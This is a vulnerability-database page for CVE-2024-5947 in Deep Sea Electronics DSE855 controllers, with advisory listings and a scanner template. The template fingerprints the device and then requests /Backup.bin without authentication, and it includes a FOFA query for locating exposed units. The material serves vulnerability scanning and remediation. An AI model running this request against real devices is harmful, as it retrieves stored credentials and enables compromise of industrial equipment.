| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
| Deep Sea Electronics DSE855 Remote Authentication Bypass Vulnerability | 3 Jul 202400:00 | – | zdt | |
| CVE-2024-5947 | 1 Sep 202401:57 | – | circl | |
| Deep Sea Electronics DSE855 Security Vulnerability | 13 Jun 202400:00 | – | cnnvd | |
| CVE-2024-5947 | 13 Jun 202419:40 | – | cve | |
| CVE-2024-5947 Deep Sea Electronics DSE855 Configuration Backup Missing Authentication Information Disclosure Vulnerability | 13 Jun 202419:40 | – | cvelist | |
| Deep Sea Electronics DSE855 | 24 Oct 202406:00 | – | ics | |
| CVE-2024-5947 | 13 Jun 202420:15 | – | nvd | |
| CVE-2024-5947 | 13 Jun 202420:15 | – | osv | |
| Deep Sea Electronics DSE855 Remote Authentication Bypass | 3 Jul 202400:00 | – | packetstorm | |
| PT-2024-37261 · Deep Sea Electronics · Dse855 | 13 Jun 202400:00 | – | ptsecurity |
| Source | Link |
|---|---|
| nvd | www.nvd.nist.gov/vuln/detail/CVE-2024-5947 |
| packetstormsecurity | www.packetstormsecurity.com/files/179342/Deep-Sea-Electronics-DSE855-Remote-Authentication-Bypass.html |
| zerodayinitiative | www.zerodayinitiative.com/advisories/ZDI-24-671/ |
id: CVE-2024-5947
info:
name: Deep Sea Electronics DSE855 - Authentication Bypass
author: s4e-io
severity: medium
description: |
Deep Sea Electronics DSE855 Configuration Backup Missing Authentication Information Disclosure Vulnerability. This vulnerability allows network-adjacent attackers to disclose sensitive information on affected installations of Deep Sea Electronics DSE855 devices. Authentication is not required to exploit this vulnerability. The specific flaw exists within the web-based UI. The issue results from the lack of authentication prior to allowing access to functionality. An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise. Was ZDI-CAN-22679.
impact: |
Unauthenticated network-adjacent attackers can download configuration backup files containing stored credentials without authentication.
remediation: |
Contact Deep Sea Electronics for a firmware update that addresses the authentication bypass vulnerability in DSE855 devices.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2024-5947
- https://packetstormsecurity.com/files/179342/Deep-Sea-Electronics-DSE855-Remote-Authentication-Bypass.html
- https://www.zerodayinitiative.com/advisories/ZDI-24-671/
classification:
epss-score: 0.02418
epss-percentile: 0.82141
metadata:
verified: "true"
max-request: 1
vendor: Deep Sea Electronics
product: DSE855
fofa-query: "Deep Sea Electronics"
tags: packetstorm,cve,cve2024,bypass,info-leak,vuln
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body,"Copyright Deep Sea Electronics")'
- "status_code == 200"
condition: and
internal: true
- raw:
- |
GET /Backup.bin HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(content_type,"Unknown")'
- "status_code == 200"
condition: and
# digest: 4a0a004730450220551b95d37caf1771491d8606301f3de48c207d098e106efb69f0c35ea0ad3c6b02210091c6a9107d6b49ca3a5aa3eeb6b4796963e3d90a9d8ccb4e9a24534778eb5143:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation